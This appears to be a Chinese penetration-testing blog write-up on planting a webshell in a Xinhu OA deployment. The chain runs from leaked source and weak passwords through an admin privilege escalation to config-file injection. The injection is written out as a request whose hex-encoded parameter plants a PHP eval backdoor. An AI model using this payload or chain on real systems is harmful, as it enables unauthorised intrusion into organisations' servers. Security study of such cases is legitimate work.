[攻防实战]爽文一把梭getshell

新闻资讯   2023-06-07 15:05   66   0  
前言

梭哈梭哈就是梭哈。

爽文警告


不是星标不推送文章了。

师傅也不想吧~

快把极梦C设置成星标吧。




信息收集


目标为jmc.com

收集到了一个子域名 erp.jmc.com子域名



1


发现子域名存在一个源码泄漏漏洞。

其中oa.zip是源码。

其余都是一个登录页面。

这里重点是oa的登录页面。

oa是信乎OA,根据oa.zip泄漏.找到了公司名单。存在几个弱口令。



2

第一步查看历史漏洞。

发现泄漏出来的漏洞,如果想getshell全部都在后台。

1.后台文件上传getshell

2.后台配置文件getshell

不过都需要是管理员的情况下。


3

如何获取管理员呢?这里查看历史漏洞没有发现什么有价值的。

这里利用了独家秘方的一个越权漏洞。修改+新建把普通用户改成了管理员。

PS:经过本地测试,这里修改后普通用户会存在一些bug。谨慎使用!


4

上传webshell就简单了。--网上很多教程。

这里利用了后台配置文件上传进行getshell,

因为是写入了配置文件,对目标页面会有危险。

在写入后抓紧复原。


/index.php?a=changestyle&m=geren&d=system&ajaxbool=true&style=21,id=1,name=0x610A6576616C28245F504F53545B315D293B2F2F


清除COOKIES再登录系统 --> 发包:/index.php?a=savecong&m=cog&d=system&ajaxbool=true&rnd=705961

根据教材走,这里就已经成功上传了webshell。shell地址:http://erp.jmc.com/密码为1

5

然后上传一个新的马,恢复配置文件。


6

无法进行命令执行。

全部乱码。修改编码也没啥用。


这里要不把所有的webshell管理工具都尝试一遍,要不就上传php文件尝试。

这里选择了上传phpinfo,发现并未禁用参数。

又上传了system(whoami),发现也是可以成功执行的。

然后利用冰蝎成功命令执行。








星球内容

正式运营星球:

1.src真实漏洞挖掘案例分享(永久不定时更新),过程详细一看就会哦。
2.自研/二开等工具/平台的分享。
3.漏洞分析/资料共享等。

























关于文章/Tools获取方式:请关注交流群或者知识星球。











关于交流群:因为某些原因,更改一下交流群的获取方式:

1.请点击联系我们->联系官方->客服小助手添加二维码拉群 。  







关于知识星球的获取方式:

1.后台回复发送 "知识星球",即可获取知识星球二维码。

2如若上述方式不行,请点击联系我们->联系官方->客服小助手添加二维码进入星球 。  

3.为了提高质量,推出"免费名人堂"名额,后台回复发送 "知识星球"了解详情。








免责声明


        


本公众号文章以技术分享学习为目的。

由于传播、利用本公众号发布文章而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号及作者不为此承担任何责任。

一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!






文章引用微信公众号"极梦C",如有侵权,请联系管理员删除!

博客评论
还没有人评论,赶紧抢个沙发~
发表评论
说明:请文明发言,共建和谐网络,您的个人信息不会被公开显示。